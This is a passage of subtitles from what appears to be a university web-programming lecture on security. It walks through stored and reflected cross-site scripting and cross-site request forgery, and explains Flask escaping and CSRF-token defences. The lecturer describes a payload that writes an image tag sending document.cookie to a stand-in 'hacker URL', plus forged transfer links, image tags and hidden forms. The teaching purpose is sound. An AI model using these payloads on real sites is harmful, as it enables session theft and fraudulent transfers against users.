00:54:26,310 --> 00:54:28,590
because that cookie is a
valid cookie, for instance.

1216
00:54:28,590 --> 00:54:31,270
And so let's take a look
at now, if it wasn't

1217
00:54:31,270 --> 00:54:36,030
this script that was being passed
into the application, but this script.

1218
00:54:36,030 --> 00:54:38,440
Slightly different,
slightly more complicated.

1219
00:54:38,440 --> 00:54:41,370
We've got /script, so
we're starting JavaScript.

1220
00:54:41,370 --> 00:54:45,030
We say document.write, which
is just a way of writing

1221
00:54:45,030 --> 00:54:48,960
new information, new text, into
the HTML content of the page,

1222
00:54:48,960 --> 00:54:51,870
and we're adding an image,
which seems sort of strange.

1223
00:54:51,870 --> 00:54:55,080
Image source equals hacker
URL, where hacker URL

1224
00:54:55,080 --> 00:54:57,930
is some URL of some hacker's website.

1225
00:54:57,930 --> 00:55:03,177
And cookie equals, and then
we added document.cookie,

1226
00:55:03,177 --> 00:55:05,760
which is going to represent the
cookie for this particular web

1227
00:55:05,760 --> 00:55:07,920
browser, this particular page.

1228
00:55:07,920 --> 00:55:11,010
And then end angled bracket, and
that's the end of the JavaScript.

1229
00:55:11,010 --> 00:55:17,190
We effectively just added an image tag
into the page where the source of that

1230
00:55:17,190 --> 00:55:23,024
image is supposedly
hacker_url?cookie=document.cookie.

1231
00:55:23,024 --> 00:55:23,940
Why is that a problem?

1232
00:55:23,940 --> 00:55:25,250
What's just happened here?

1233
00:55:25,250 --> 00:55:25,750
Yeah?

1234
00:55:25,750 --> 00:55:27,833
AUDIENCE: You're going to
hit the hacker's website

1235
00:55:27,833 --> 00:55:31,650
and pass your cookie as a [INAUDIBLE].

1236
00:55:31,650 --> 00:55:32,400
BRIAN YU: Exactly.

1237
00:55:32,400 --> 00:55:36,002
We're going to hit the hacker's
website, and any time we're

1238
00:55:36,002 --> 00:55:38,460
making a request to that server,
that server is potentially

1239
00:55:38,460 --> 00:55:40,650
logging exactly what URL was requested.

1240
00:55:40,650 --> 00:55:43,200
In fact, if you've been using
Flask or Django all this time

1241
00:55:43,200 --> 00:55:44,908
and you've looked at
the terminal window,

1242
00:55:44,908 --> 00:55:47,439
you've probably noticed
over here that you've

1243
00:55:47,439 --> 00:55:49,730
been able to see every single
request that's been made.

1244
00:55:49,730 --> 00:55:54,510
Here was a GET request to the URL slash,
here's a GET request to the URL /foo,

1245
00:55:54,510 --> 00:55:56,870
here's a GET request to the URL /bar.

1246
00:55:56,870 --> 00:56:01,140
And so if our hacker is carefully
monitoring all of the requests

1247
00:56:01,140 --> 00:56:04,920
to the server over here at hacker URL,
they're going to notice something like

1248
00:56:04,920 --> 00:56:09,480
someone made a request to
hacker_url?cookie= and then some

1249
00:56:09,480 --> 00:56:10,200
cookie, right?

1250
00:56:10,200 --> 00:56:13,620
So by injecting this JavaScript
code into the user's web browser

1251
00:56:13,620 --> 00:56:16,470
and having this run, they've
added this image tag that's

1252
00:56:16,470 --> 00:56:18,810
going to make a request
to hacker_url and is

1253
00:56:18,810 --> 00:56:21,480
going to pass this information,
that cookie-- so now

1254
00:56:21,480 --> 00:56:23,610
the cookie that was
originally on your computer,

1255
00:56:23,610 --> 00:56:27,210
someone else now has access to
because you've now just put it inside

1256
00:56:27,210 --> 00:56:29,185
of some request that's going elsewhere.

1257
00:56:29,185 --> 00:56:32,310
And that's why Chrome was giving us
that error, that warning message about,

1258
00:56:32,310 --> 00:56:32,940
well, be careful.

1259
00:56:32,940 --> 00:56:35,898
We tried to block you from being able
to see this page because it looks

1260
00:56:35,898 --> 00:56:38,770
like someone might be able to
inject JavaScript code that

1261
00:56:38,770 --> 00:56:41,860
might be able to steal your
passwords or other information.

1262
00:56:41,860 --> 00:56:46,660
Because any information, we can just
send in a request to some other URL,

1263
00:56:46,660 --> 00:56:47,930
in this case.

1264
00:56:47,930 --> 00:56:50,890
And so this is really the danger of
cross-site scripting, this ability

1265
00:56:50,890 --> 00:56:55,090
to inject JavaScript
into any arbitrary page.

1266
00:56:55,090 --> 00:56:57,689
Questions about any of that?

1267
00:56:57,689 --> 00:56:58,480
AUDIENCE: Question.

1268
00:56:58,480 --> 00:56:59,020
BRIAN YU: Great.

1269
00:56:59,020 --> 00:56:59,530
Yeah?

1270
00:56:59,530 --> 00:57:01,155
AUDIENCE: What did they do with cookie?

1271
00:57:01,155 --> 00:57:01,951
I mean--

1272
00:57:01,951 --> 00:57:02,950
BRIAN YU: Good question.

1273
00:57:02,950 --> 00:57:04,160
What can we do with the cookie?

1274
00:57:04,160 --> 00:57:06,243
So once you have the cookie,
you could potentially

1275
00:57:06,243 --> 00:57:08,950
use that to login as
someone else, for instance.

1276
00:57:08,950 --> 00:57:12,200
Or any secure information that's stored
in that cookie, you'd have access to.

1277
00:57:12,200 --> 00:57:15,954
So if there are secure pieces
of data stored in the cookie,

1278
00:57:15,954 --> 00:57:17,620
then that's potentially a vulnerability.

1279
00:57:17,620 --> 00:57:19,872
And we talked about in
last lecture, I believe,

1280
00:57:19,872 --> 00:57:21,580
how Flask gives you
the option of, if you

1281
00:57:21,580 --> 00:57:24,880
want to, storing all of your session
information inside of a cookie.

1282
00:57:24,880 --> 00:57:28,760
Which means secure information about
the contents of your shopping cart

1283
00:57:28,760 --> 00:57:30,550
or how much money you
have in your account

1284
00:57:30,550 --> 00:57:32,440
might be stored inside
of that cookie, which

1285
00:57:32,440 --> 00:57:34,090
could potentially be a vulnerability.

1286
00:57:34,090 --> 00:57:36,020
But even if that's
not there, at minimum,

1287
00:57:36,020 --> 00:57:38,860
that cookie is a way of
convincing the server

1288
00:57:38,860 --> 00:57:40,970
that someone else is who you are.

1289
00:57:40,970 --> 00:57:44,260
If they steal your cookie, they can
convince the server that they are you.

1290
00:57:44,260 --> 00:57:45,790
And then they can have
access to your account

1291
00:57:45,790 --> 00:57:48,550
on whatever web application this
is and potentially do whatever

1292
00:57:48,550 --> 00:57:50,725
they want with that information.

1293
00:57:50,725 --> 00:57:56,170
AUDIENCE: Would that be time bound
with the-- like with that session,

1294
00:57:56,170 --> 00:57:58,150
that you'd have to use
it for the next session?

1295
00:57:58,150 --> 00:57:59,090
BRIAN YU: Good question.

1296
00:57:59,090 --> 00:57:59,810
Would it be time bounded?

1297
00:57:59,810 --> 00:58:00,935
It quite possibly could be.

1298
00:58:00,935 --> 00:58:02,920
That if I were to log
out for instance and now

1299
00:58:02,920 --> 00:58:05,830
the server forgets about that
cookie, now suddenly we've

1300
00:58:05,830 --> 00:58:08,230
been able to avert this
scenario, or this is no longer

1301
00:58:08,230 --> 00:58:09,279
going to be a valid way.

1302
00:58:09,279 --> 00:58:12,070
But if they can convince me to
click on the URL again the next time

1303
00:58:12,070 --> 00:58:15,590
I log into the site, now it suddenly
becomes a problem all over again.

1304
00:58:15,590 --> 00:58:17,590
And so we'll want to think
carefully about, when

1305
00:58:17,590 --> 00:58:20,480
we're using JavaScript inside
of our web applications,

1306
00:58:20,480 --> 00:58:22,610
is there a place where
we might be vulnerable.

1307
00:58:22,610 --> 00:58:26,470
In fact, our original web application
didn't even have any JavaScript in it

1308
00:58:26,470 --> 00:58:27,320
at all.

1309
00:58:27,320 --> 00:58:30,760
It was really just Flask
and returning text.

1310
00:58:30,760 --> 00:58:34,900
But still, a malicious hacker was able
to inject JavaScript into our page

1311
00:58:34,900 --> 00:58:38,552
just because we were including that
raw JavaScript in there as well.

1312
00:58:38,552 --> 00:58:40,510
So these are certainly
things to be mindful of.

1313
00:58:40,510 --> 00:58:43,180
And both Flask and Django
have ways of making sure

1314
00:58:43,180 --> 00:58:46,960
that when you're inserting information,
it's inserted in a safe way such

1315
00:58:46,960 --> 00:58:50,200
that we escape any potential
JavaScript characters to help

1316
00:58:50,200 --> 00:58:51,980
avoid these types of situations.

1317
00:58:51,980 --> 00:58:54,010
But these are just good
things to be mindful of

1318
00:58:54,010 --> 00:58:59,110
and be careful about as we go about
designing these web applications.

1319
00:58:59,110 --> 00:59:02,770
Let's go ahead and take another look at
another example of cross-site scripting

1320
00:59:02,770 --> 00:59:04,420
and how it can happen.

1321
00:59:04,420 --> 00:59:07,269
What I will look at now is a
slightly more complicated site,

1322
00:59:07,269 --> 00:59:09,310
and this is one that Chrome
is actually not going

1323
00:59:09,310 --> 00:59:11,150
to be able to fully defend against.

1324
00:59:11,150 --> 00:59:16,090
And what cross-site
scripting one is is it's

1325
00:59:16,090 --> 00:59:19,472
a web application that is going
to display a message list.

1326
00:59:19,472 --> 00:59:20,680
It's sort of a message board.

1327
00:59:20,680 --> 00:59:23,380
We saw a brief example of something
that looked very similar to this

1328
00:59:23,380 --> 00:59:25,000
when we were first
taking a look at Flask

1329
00:59:25,000 --> 00:59:26,999
and how we're able to
render templates and such.

1330
00:59:26,999 --> 00:59:28,600
This one actually uses a database.

1331
00:59:28,600 --> 00:59:31,550
And I'll show you what it looks like.

1332
00:59:31,550 --> 00:59:33,460
We'll look at application.py.

1333
00:59:33,460 --> 00:59:35,699
So I have a SQLite
database that I'm going

1334
00:59:35,699 --> 00:59:38,365
to be using that's just going to
store a whole bunch of messages

1335
00:59:38,365 --> 00:59:40,750
so that it can be on this
public message board.

1336
00:59:40,750 --> 00:59:44,590
And effectively, I have just one
route, a default index route,

1337
00:59:44,590 --> 00:59:48,550
where if I'm just viewing
this page by a GET request,

1338
00:59:48,550 --> 00:59:51,777
just asking to see the page,
I skip over this post stuff,

1339
00:59:51,777 --> 00:59:53,110
and I just get all the messages.

1340
00:59:53,110 --> 00:59:57,040
Selecting star from messages, just get
all the messages in the message board.

1341
00:59:57,040 --> 01:00:00,310
And then go ahead and render
this template, index.html passing

1342
01:00:00,310 --> 01:00:01,870
in those messages.

1343
01:00:01,870 --> 01:00:05,830
And then, if it's a
post request, then I'm

1344
01:00:05,830 --> 01:00:09,940
going to get whatever the contents
of the message that I'm trying to add

1345
01:00:09,940 --> 01:00:12,340
is, whatever came in through
this form, and then I'm

1346
01:00:12,340 --> 01:00:16,730
going to insert into my messages
table, whatever that content is.

1347
01:00:16,730 --> 01:00:20,350
So if I type in a new message and insert
it, I submit that via a post request.

1348
01:00:20,350 --> 01:00:22,890
It gets added to my list
of growing messages.

1349
01:00:22,890 --> 01:00:25,270
And otherwise, if I'm just
requesting the page normally,

1350
01:00:25,270 --> 01:00:27,732
or even after something
is done being inserted,

1351
01:00:27,732 --> 01:00:29,440
I'm going to request
for all the messages

1352
01:00:29,440 --> 01:00:32,800
by selecting it all from the
database and then rendering it inside

1353
01:00:32,800 --> 01:00:34,690
of index.html.

1354
01:00:34,690 --> 01:00:36,100
So what does that look like?

1355
01:00:36,100 --> 01:00:38,890
The result is that using just
these couple of lines of code,

1356
01:00:38,890 --> 01:00:42,820
I now have this Message List site
where I can type in foo as a message,

1357
01:00:42,820 --> 01:00:43,650
submit that.

1358
01:00:43,650 --> 01:00:46,600
And now the message foo is
there, bar goes in there,

1359
01:00:46,600 --> 01:00:48,670
and this gets added to
the public message board.

1360
01:00:48,670 --> 01:00:51,887
And of course, if I were to close
this site and I were to open it again

1361
01:00:51,887 --> 01:00:54,220
or someone else were to open
it again on their computer,

1362
01:00:54,220 --> 01:00:57,670
because it's all drawing from the same
database, now I go back here again.

1363
01:00:57,670 --> 01:01:00,920
Foo and bar are still there, so
those messages are still there.

1364
01:01:00,920 --> 01:01:08,958
And so where is the opportunity for
cross-site scripting attacks here?

1365
01:01:08,958 --> 01:01:12,201
AUDIENCE: You could store
a script in the database.

1366
01:01:12,201 --> 01:01:12,950
BRIAN YU: Exactly.

1367
01:01:12,950 --> 01:01:16,840
We could store a script in the database,
a script could be one of the messages.

1368
01:01:16,840 --> 01:01:19,820
Such that that JavaScript
code gets just inserted

1369
01:01:19,820 --> 01:01:23,094
into the HTML contents
of this page here,

1370
01:01:23,094 --> 01:01:24,510
and then it could potentially run.

1371
01:01:24,510 --> 01:01:31,460
So if I were to add a message that
was like, script alert hi /script,

1372
01:01:31,460 --> 01:01:35,214
and then submit that, well, what seems
to happen here is that when I try

1373
01:01:35,214 --> 01:01:37,130
and submit it, Chrome
is giving me some error.

1374
01:01:37,130 --> 01:01:39,880
It's giving me that same error as
before, this page isn't working.

1375
01:01:39,880 --> 01:01:41,089
Chrome detected unusual code.

1376
01:01:41,089 --> 01:01:43,921
Here's that cross-site scripting
auditor saying, hey, wait a minute,

1377
01:01:43,921 --> 01:01:44,880
something's wrong.

1378
01:01:44,880 --> 01:01:48,320
And the reason it was able
to do that is because when

1379
01:01:48,320 --> 01:01:50,600
I was submitting my request,
there was some JavaScript

1380
01:01:50,600 --> 01:01:52,100
included inside that request.

1381
01:01:52,100 --> 01:01:53,937
So Chrome was able to
detect that something

1382
01:01:53,937 --> 01:01:57,020
might be a little fishy there, that I
was submitting this JavaScript along

1383
01:01:57,020 --> 01:01:59,186
with the request, and then
it was coming back to me.

1384
01:01:59,186 --> 01:02:04,370
So what about if I were to close
the page and open it again.

1385
01:02:04,370 --> 01:02:06,050
Now I'm just requesting the page.

1386
01:02:06,050 --> 01:02:08,672
There's no JavaScript in the
URL, and all that's happening

1387
01:02:08,672 --> 01:02:10,880
is that it's extracting
information from the database

1388
01:02:10,880 --> 01:02:12,590
and displaying it onto the page.

1389
01:02:12,590 --> 01:02:14,630
And so Chrome now has
no real way of knowing

1390
01:02:14,630 --> 01:02:17,360
that there is any potential
cross-site scripting involved.

1391
01:02:17,360 --> 01:02:19,940
So I go here, and now
I get the hi alert.

1392
01:02:19,940 --> 01:02:22,815
They were able to run arbitrary
JavaScript on this page.

1393
01:02:22,815 --> 01:02:25,190
And then I see foo and bar
and then just some empty thing

1394
01:02:25,190 --> 01:02:28,920
because that's where the
JavaScript code was before.

1395
01:02:28,920 --> 01:02:33,470
It's like here's an example of us being
able to add a cross-site scripting

1396
01:02:33,470 --> 01:02:37,040
vulnerability that we were able to take
advantage of, exploit, by just adding

1397
01:02:37,040 --> 01:02:39,720
JavaScript code into here as well.

1398
01:02:39,720 --> 01:02:43,085
And so I haven't been committing
these changes to the database.

1399
01:02:43,085 --> 01:02:44,210
I haven't been saving them.

1400
01:02:44,210 --> 01:02:47,390
So if I run this again, we'll
be reset back to a clean slate.

1401
01:02:47,390 --> 01:02:49,984
So if I go back here, I see
a blank message list again.

1402
01:02:49,984 --> 01:02:52,400
So what are some other things
that I could potentially do?

1403
01:02:52,400 --> 01:02:57,080
Well, I might be able to say
someone does foo and then bar.

1404
01:02:57,080 --> 01:02:58,540
Maybe I could say--

1405
01:02:58,540 --> 01:03:00,540
I just want to display
whatever contents I want.

1406
01:03:00,540 --> 01:03:03,905
So I'm going to add JavaScript
that says document.body.innerH

1407
01:03:03,905 --> 01:03:14,149
TML=whateverpageIwant/script,
and I submit that.

1408
01:03:14,149 --> 01:03:16,190
Again, Chrome blocks it
the first time because it

1409
01:03:16,190 --> 01:03:17,660
detects that, with
this request at least,

1410
01:03:17,660 --> 01:03:19,345
there was something fishy going along.

1411
01:03:19,345 --> 01:03:22,220
But when the next request comes in,
when the next person comes along,

1412
01:03:22,220 --> 01:03:24,489
they open this page, now
message list is gone.

1413
01:03:24,489 --> 01:03:26,780
I don't see foo and bar or
any of those other messages.

1414
01:03:26,780 --> 01:03:29,780
I just see whatever the contents of
the page that I wanted to show was.

1415
01:03:29,780 --> 01:03:32,387
And that gets displayed
to the user here.

1416
01:03:32,387 --> 01:03:34,220
So that's certainly one
thing they could do.

1417
01:03:34,220 --> 01:03:37,428
Certainly stealing cookies is another
thing that could happen in the same way

1418
01:03:37,428 --> 01:03:38,970
that we saw it in the last example.

1419
01:03:38,970 --> 01:03:40,490
Or someone could say, you know what?

1420
01:03:40,490 --> 01:03:42,650
Let's just take the user to
an entirely different site.

1421
01:03:42,650 --> 01:03:45,980
Let's take them to my site where I can
now try and steal information from them

1422
01:03:45,980 --> 01:03:49,990
as well by saying
window.location equals,

1423
01:03:49,990 --> 01:03:54,620
and I can say cs50.github.io/web.

1424
01:03:54,620 --> 01:03:59,012
And so now this window.location
equals some URL is the JavaScript code

1425
01:03:59,012 --> 01:03:59,720
that I'm running.

1426
01:03:59,720 --> 01:04:00,660
I'll submit that.

1427
01:04:00,660 --> 01:04:03,470
And when the next user comes along
and they try and go to my page,

1428
01:04:03,470 --> 01:04:04,670
now they're suddenly redirected.

1429
01:04:04,670 --> 01:04:06,350
I've taken them somewhere else entirely.

1430
01:04:06,350 --> 01:04:09,190
And if that other new page looks
sort of similar to the old page,

1431
01:04:09,190 --> 01:04:11,690
they might be tricked into
thinking it is the same old page.

1432
01:04:11,690 --> 01:04:14,939
And they might be interacting with it,
typing in their credentials, usernames,

1433
01:04:14,939 --> 01:04:18,620
and passwords, and now this hacker is
able to gain access to that as well.

1434
01:04:18,620 --> 01:04:21,770
And so how do we defend against
these sorts of cross-site scripting

1435
01:04:21,770 --> 01:04:23,300
vulnerabilities?

1436
01:04:23,300 --> 01:04:25,370
Well, Flask is actually
pretty good about this.

1437
01:04:25,370 --> 01:04:28,610
And by default, when you're rendering
a template, like render template,

1438
01:04:28,610 --> 01:04:32,480
and you're plugging in some information,
Flask will, by default, automatically

1439
01:04:32,480 --> 01:04:33,636
escape that stuff for you.

1440
01:04:33,636 --> 01:04:34,760
It will say, you know what?

1441
01:04:34,760 --> 01:04:37,725
This is stuff that could
potentially be JavaScript

1442
01:04:37,725 --> 01:04:40,850
or could potentially be unsafe, so
we'll go ahead and escape it and protect

1443
01:04:40,850 --> 01:04:41,892
that information for you.

1444
01:04:41,892 --> 01:04:43,683
Certainly not all
frameworks are like that,

1445
01:04:43,683 --> 01:04:46,070
and certainly if you're just
doing string concatenation

1446
01:04:46,070 --> 01:04:48,170
like we were in the previous
example, then that's

1447
01:04:48,170 --> 01:04:50,880
not something we can really rely on.

1448
01:04:50,880 --> 01:04:54,920
But if we take a look
at templates index.HTML,

1449
01:04:54,920 --> 01:04:59,060
in order for this to really work
the way that I wanted it to,

1450
01:04:59,060 --> 01:05:02,870
I had to add this bar
safe in here, where

1451
01:05:02,870 --> 01:05:06,560
this is my way of telling Jinja2,
the template rendering engine,

1452
01:05:06,560 --> 01:05:08,060
don't worry about escaping anything.

1453
01:05:08,060 --> 01:05:09,500
Just display the contents.

1454
01:05:09,500 --> 01:05:12,139
And so in reality, if you were
to just do message.content,

1455
01:05:12,139 --> 01:05:14,930
Flask would be smart enough to try
and defend against this for you.

1456
01:05:14,930 --> 01:05:16,763
But it is something
that you just want to be

1457
01:05:16,763 --> 01:05:20,820
careful about anytime you have text that
you think is safe, is it really safe?

1458
01:05:20,820 --> 01:05:23,780
Is there a potential for JavaScript
code to be injected into there?

1459
01:05:23,780 --> 01:05:27,320
And if you're generating the templates
yourself by string concatenation

1460
01:05:27,320 --> 01:05:30,770
like we were in the previous example,
is there an opportunity for cross-site

1461
01:05:30,770 --> 01:05:33,440
scripting to appear there as well?

1462
01:05:33,440 --> 01:05:37,850
And so that's certainly one of
the major vulnerabilities that

1463
01:05:37,850 --> 01:05:42,560
can come about as we start
to deal with JavaScript

1464
01:05:42,560 --> 01:05:45,486
and using JavaScript inside
of our web applications.

1465
01:05:45,486 --> 01:05:46,360
Questions about that?

1466
01:05:46,360 --> 01:05:49,600


1467
01:05:49,600 --> 01:05:50,350
All right.

1468
01:05:50,350 --> 01:05:52,810
Let's move on and take a look
at the next web framework

1469
01:05:52,810 --> 01:05:55,180
that we talked about, which
in particular was Django.

1470
01:05:55,180 --> 01:05:56,620
And so when we first
took a look at Django,

1471
01:05:56,620 --> 01:05:58,900
we looked at how we would go
about doing the same things we

1472
01:05:58,900 --> 01:06:01,540
did in Flask, about rendering
templates and displaying pages

1473
01:06:01,540 --> 01:06:04,090
and using server side
logic to handle requests.

1474
01:06:04,090 --> 01:06:06,020
And in particular, we looked at forms.

1475
01:06:06,020 --> 01:06:08,681
And when we did look at
forms, I had to add a line

1476
01:06:08,681 --> 01:06:10,930
to one of the forums that
seemed a little bit strange.

1477
01:06:10,930 --> 01:06:12,580
Does anyone remember what that line was?

1478
01:06:12,580 --> 01:06:13,080
Yes?

1479
01:06:13,080 --> 01:06:14,320
AUDIENCE: CSRF token.

1480
01:06:14,320 --> 01:06:16,690
BRIAN YU: Yeah, we added
the CSRF token line to it.

1481
01:06:16,690 --> 01:06:19,630
And I said don't worry about that
for now, we'll talk about it later.

1482
01:06:19,630 --> 01:06:22,296
And now is that time that we're
going to start talking about it.

1483
01:06:22,296 --> 01:06:25,420
CSRF stands for Cross-Site
Request Forgery.

1484
01:06:25,420 --> 01:06:27,910
And this is yet another
type of attack that people

1485
01:06:27,910 --> 01:06:30,910
can use where Cross-Site
Request Forgery is

1486
01:06:30,910 --> 01:06:35,920
the idea of trying to forge a
request to some other website

1487
01:06:35,920 --> 01:06:39,560
in order to take some action that the
user might already be logged into.

1488
01:06:39,560 --> 01:06:41,330
And so what might be an example of that?

1489
01:06:41,330 --> 01:06:45,040
Let's say, for instance, that
someone was logged into their bank,

1490
01:06:45,040 --> 01:06:46,480
on their bank's website.

1491
01:06:46,480 --> 01:06:49,810
And I, on some other website,
wanted to try and trick

1492
01:06:49,810 --> 01:06:53,620
the user into transferring
some money to me, for instance.

1493
01:06:53,620 --> 01:06:55,140
How might I to go about doing that?

1494
01:06:55,140 --> 01:06:56,890
Well, you might imagine
very simply that I

1495
01:06:56,890 --> 01:06:59,181
might start by creating a
website, my own website, that

1496
01:06:59,181 --> 01:07:00,790
looks something like this.

1497
01:07:00,790 --> 01:07:04,160
I have the body of my website,
I have an a href, a link.

1498
01:07:04,160 --> 01:07:09,610
And this link goes to
HTTP:yourbank.com/transfer,

1499
01:07:09,610 --> 01:07:13,240
and then some arguments, some GET
parameters, transfer to Brian, amount,

1500
01:07:13,240 --> 01:07:14,920
2,800, for instance.

1501
01:07:14,920 --> 01:07:17,170
And if the bank is set
up in this such way,

1502
01:07:17,170 --> 01:07:21,640
where making a GET request to /transfer
by passing in as arguments who

1503
01:07:21,640 --> 01:07:25,057
you're transferring to and what
the amount is initiates a transfer,

1504
01:07:25,057 --> 01:07:27,640
now I've been able to create a
sort of security vulnerability.

1505
01:07:27,640 --> 01:07:30,420
That if this is what's
displayed on my page

1506
01:07:30,420 --> 01:07:33,820
and I can convince someone to click
here, so long as they're already

1507
01:07:33,820 --> 01:07:37,210
logged in to yourbank.com,
then clicking on that link

1508
01:07:37,210 --> 01:07:39,620
automatically will
initiate that transfer.

1509
01:07:39,620 --> 01:07:42,250
So if yourbank.com is
set up in that way,

1510
01:07:42,250 --> 01:07:45,550
such that transferring money just
happens via this GET request,

1511
01:07:45,550 --> 01:07:48,460
then that's certainly a way
that I could trick someone

1512
01:07:48,460 --> 01:07:50,350
into transferring money to me.

1513
01:07:50,350 --> 01:07:53,110
What are some ways to
protect against that?

1514
01:07:53,110 --> 01:07:58,027
What can yourbank.com do to make sure
that we can't do something like this?

1515
01:07:58,027 --> 01:07:59,860
Such that someone else
can't just add a link

1516
01:07:59,860 --> 01:08:02,026
that says click here and
then automatically initiate

1517
01:08:02,026 --> 01:08:03,010
the transfer of money.

1518
01:08:03,010 --> 01:08:03,210
Yeah?

1519
01:08:03,210 --> 01:08:05,335
AUDIENCE: When you're doing
an operation like this,

1520
01:08:05,335 --> 01:08:08,946
you want to send some
token with it so it

1521
01:08:08,946 --> 01:08:11,954
knows that it was you that's doing
it, and you're not being played.

1522
01:08:11,954 --> 01:08:13,120
BRIAN YU: Great, some token.

1523
01:08:13,120 --> 01:08:17,242
And certainly, we'll see more about
that when we get to some more details.

1524
01:08:17,242 --> 01:08:19,700
But right now, this is just a
link that you're clicking on.

1525
01:08:19,700 --> 01:08:21,310
So we're just clicking on a link.

1526
01:08:21,310 --> 01:08:23,278
And what else could the bank do?

1527
01:08:23,278 --> 01:08:24,819
But that's certainly one good answer.

1528
01:08:24,819 --> 01:08:28,691


1529
01:08:28,691 --> 01:08:32,174
AUDIENCE: Not expose a service
with a GET request like that.

1530
01:08:32,174 --> 01:08:32,840
BRIAN YU: Great.

1531
01:08:32,840 --> 01:08:34,304
Not expose a GET request like this.

1532
01:08:34,304 --> 01:08:35,720
That could certainly be something.

1533
01:08:35,720 --> 01:08:38,470
And in fact, this is something
that's generally good web practice.

1534
01:08:38,470 --> 01:08:42,444
That you don't want GET requests to
be modifying the state of something,

1535
01:08:42,444 --> 01:08:44,319
like modifying who has
what amounts of money.

1536
01:08:44,319 --> 01:08:47,231
That generally, all of that should
be inside of a POST request, such

1537
01:08:47,231 --> 01:08:49,939
that it really needs to be a form
submission that needs to happen

1538
01:08:49,939 --> 01:08:52,609
in order to allow that to happen.

1539
01:08:52,609 --> 01:08:54,800
And of course, maybe this
isn't such a big deal

1540
01:08:54,800 --> 01:08:57,979
because I'm saying, click here.

1541
01:08:57,979 --> 01:09:01,515
And so as long as the user is smart
and as long as they're careful and they

1542
01:09:01,515 --> 01:09:03,890
hover over the link and see,
oh, this is going to take me

1543
01:09:03,890 --> 01:09:07,370
to yourbank.com/transfer, then I'm safe.

1544
01:09:07,370 --> 01:09:09,180
So how might a hacker get around that?

1545
01:09:09,180 --> 01:09:11,990
In order to make it such that the
user doesn't need to click on,

1546
01:09:11,990 --> 01:09:13,948
click here, in order to
initiate that transfer?

1547
01:09:13,948 --> 01:09:18,074
AUDIENCE: They don't need
[INAUDIBLE] in other website.

1548
01:09:18,074 --> 01:09:18,740
BRIAN YU: Great.

1549
01:09:18,740 --> 01:09:22,160
So hypothetically, we could just
add some JavaScript code here

1550
01:09:22,160 --> 01:09:25,642
that says that rather than a link
that someone needs to click on,

1551
01:09:25,642 --> 01:09:28,100
we'll just add some JavaScript
code that will automatically

1552
01:09:28,100 --> 01:09:29,683
redirect the user there, for instance.

1553
01:09:29,683 --> 01:09:32,930
And that could be something
that could happen as well.

1554
01:09:32,930 --> 01:09:35,922
But then at minimum, the user
is taken to that other web site,

1555
01:09:35,922 --> 01:09:38,130
and now they can see that
that transfer has happened.

1556
01:09:38,130 --> 01:09:40,671
But there are even more subtle
ways about doing this as well.

1557
01:09:40,671 --> 01:09:42,760
We looked at, in a
couple of slides ago, we

1558
01:09:42,760 --> 01:09:45,260
talked about how image tags,
for instance, can be used.

1559
01:09:45,260 --> 01:09:48,590
Where if you provide the link to
whatever the source of the image is,

1560
01:09:48,590 --> 01:09:51,300
that will automatically trigger
a request there as well.

1561
01:09:51,300 --> 01:09:54,740
And so you might imagine that instead of
structuring my hacking page like this,

1562
01:09:54,740 --> 01:09:59,360
if I tried this as my exploit instead,
just render an image where the source

1563
01:09:59,360 --> 01:10:03,680
of that image is yourbank.com/transfer
and here's what I'm transferring.

1564
01:10:03,680 --> 01:10:06,420
Now, no need for a user to
click on any link at all.

1565
01:10:06,420 --> 01:10:08,800
As soon as they go to my
page, your web browser

1566
01:10:08,800 --> 01:10:11,030
is going to make a request
to this URL, and that's

1567
01:10:11,030 --> 01:10:15,410
going to potentially start
to initiate a transfer.

1568
01:10:15,410 --> 01:10:18,900
And so that's certainly a
potential security vulnerability.

1569
01:10:18,900 --> 01:10:21,380
And so someone suggested
OK, well, rather

1570
01:10:21,380 --> 01:10:25,250
than make your bank take all of
its transfers via GET requests,

1571
01:10:25,250 --> 01:10:27,540
we might instead want to do
this via making it a form

1572
01:10:27,540 --> 01:10:29,540
that someone needs to
submit, some POST request.

1573
01:10:29,540 --> 01:10:33,050
That it can't just be you clicking
on a link or you rendering some image

1574
01:10:33,050 --> 01:10:36,210
that's going to trigger
the transfer of funds.

1575
01:10:36,210 --> 01:10:41,330
So maybe you might imagine that
I could do something like this.

1576
01:10:41,330 --> 01:10:44,150
This might be an exploit that
I can use now on my site.

1577
01:10:44,150 --> 01:10:48,320
That I create a form whose
action is yourbank.com/transfer,

1578
01:10:48,320 --> 01:10:51,680
the method is POST, and now I
have these hidden input type,

1579
01:10:51,680 --> 01:10:53,150
input type equals hidden.

1580
01:10:53,150 --> 01:10:55,950
This is an input type that's just
not going to appear to the user.

1581
01:10:55,950 --> 01:10:57,720
The user is not going
to see this at all.

1582
01:10:57,720 --> 01:11:01,826
It's an input type named to, whose value
is who I want to transfer the money to.

1583
01:11:01,826 --> 01:11:04,700
I have an input type that is the
amount, which is the amount of money

1584
01:11:04,700 --> 01:11:06,410
that I want to transfer.

1585
01:11:06,410 --> 01:11:08,870
And then I have an input
type called submit,

1586
01:11:08,870 --> 01:11:11,900
which is just going to be a
button that says click here.

1587
01:11:11,900 --> 01:11:16,430
And so all the user is going to see,
if this code is rendered, is what?

1588
01:11:16,430 --> 01:11:18,090
What does the user see?

1589
01:11:18,090 --> 01:11:19,000
AUDIENCE: Click here.

1590
01:11:19,000 --> 01:11:19,490
BRIAN YU: Exactly.

1591
01:11:19,490 --> 01:11:21,448
They just see this one
input field, this button

1592
01:11:21,448 --> 01:11:24,320
that says click here, because
these two input fields are hidden.

1593
01:11:24,320 --> 01:11:26,194
And of course, click
here could say anything.

1594
01:11:26,194 --> 01:11:28,116
It could say next page, for instance.

1595
01:11:28,116 --> 01:11:30,740
Something benign that looks like
something you might reasonably

1596
01:11:30,740 --> 01:11:32,656
just click that would
take you somewhere else,

1597
01:11:32,656 --> 01:11:35,960
when in reality, it's submitting a
form that's going to transfer funds

1598
01:11:35,960 --> 01:11:38,180
to someone and to some amount.

1599
01:11:38,180 --> 01:11:41,010
But of course, maybe we're OK
because if the user is careful

1600
01:11:41,010 --> 01:11:43,310
and they're not going to
click on the button, then--

1601
01:11:43,310 --> 01:11:44,480
and then if they're not
clicking on a button

1602
01:11:44,480 --> 01:11:47,438
when they don't know what that button
actually does, then they're safe,

1603
01:11:47,438 --> 01:11:52,970
how might a hackers still get around
this and still be able to get the user

1604
01:11:52,970 --> 01:11:54,669
to submit this form?

1605
01:11:54,669 --> 01:11:56,460
Even without the user
clicking on a button.

1606
01:11:56,460 --> 01:12:01,421


1607
